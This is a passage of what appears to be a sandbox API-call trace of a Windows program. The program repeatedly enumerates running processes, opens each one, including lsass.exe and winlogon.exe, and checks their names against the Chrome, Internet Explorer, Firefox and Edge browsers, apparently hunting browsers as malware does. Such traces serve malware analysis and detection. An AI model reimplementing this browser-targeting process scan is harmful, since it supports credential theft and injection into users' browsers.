	[0241.782] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.782] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0241.783] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.783] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.783] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.783] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0241.783] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.783] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.783] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0241.784] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x8738
	[0241.784] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.784] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0241.785] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.785] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.785] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.785] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0241.785] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.785] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.786] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0241.786] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x873c
	[0241.786] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.786] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0241.787] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.787] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.787] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.787] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0241.787] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.787] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.788] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0241.788] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x8740
	[0241.788] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.789] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0241.789] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.789] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.789] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.789] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0241.789] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.789] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.790] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0241.790] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0x8744
	[0241.791] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.791] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0241.791] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.791] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.791] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.791] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0241.791] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.791] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.792] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0241.792] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbb4) returned 0x8748
	[0241.793] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.793] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0241.793] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.793] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.793] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.793] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0241.793] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.793] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.794] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0241.794] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbc0) returned 0x874c
	[0241.794] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.794] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0241.795] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.795] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.795] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.795] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0241.795] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.795] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.796] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbb4, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0241.796] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x950) returned 0x8750
	[0241.796] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.796] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0241.797] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.797] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.797] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.797] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0241.797] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.797] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.797] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0241.798] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x748) returned 0x8754
	[0241.798] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.798] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0241.799] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.799] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.799] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.799] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0241.799] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.799] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.799] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0241.800] CloseHandle (hObject=0x4fd0) returned 1
	[0241.800] Sleep (dwMilliseconds=0x64) 
	[0241.894] GetCurrentProcessId () returned 0x110
	[0241.894] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0241.897] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0241.897] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0241.899] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0241.900] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x8758
	[0241.900] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.900] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0241.900] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.900] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.901] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.901] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0241.901] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.901] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.901] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0241.903] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x875c
	[0241.903] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.903] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0241.903] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.903] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.904] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.904] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0241.904] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.904] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.904] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0241.905] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x8760
	[0241.906] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.906] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0241.906] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.906] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.907] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.907] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0241.907] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.907] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.908] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0241.909] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x8764
	[0241.909] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.909] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0241.909] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.909] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.910] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.910] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0241.910] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.910] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.910] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0241.911] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x8768
	[0241.911] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.911] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0241.911] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.911] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.912] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.912] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0241.912] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.912] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.912] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0241.913] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x876c
	[0241.913] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.913] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0241.913] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.914] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.914] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.914] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0241.914] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.914] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.914] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0241.915] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x8770
	[0241.915] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.915] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0241.916] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.916] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.916] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.916] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0241.916] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.916] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.916] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0241.917] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x8774
	[0241.917] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.917] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0241.917] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.917] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.918] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.918] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0241.918] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.918] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.918] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0241.919] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x8778
	[0241.919] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.919] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0241.919] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.919] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.920] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.920] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0241.920] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.920] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.920] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0241.921] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x877c
	[0241.921] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.921] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0241.921] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.921] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.922] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.922] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0241.922] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.922] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.922] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0241.923] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x8780
	[0241.923] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.923] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0241.923] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.923] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.924] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.924] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0241.924] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.924] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.924] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0241.925] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x8784
	[0241.925] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.925] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0241.926] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.926] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.926] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.926] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0241.926] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.926] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.926] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0241.927] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x8788
	[0241.927] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.927] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0241.928] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.928] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.928] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.928] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0241.928] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.928] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.928] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0241.929] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x878c
	[0241.929] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.929] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0241.930] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.930] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.930] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.930] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0241.930] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.930] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.930] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0241.931] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x8790
	[0241.931] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.931] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0241.932] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.932] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.932] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.932] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0241.932] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.932] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.933] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
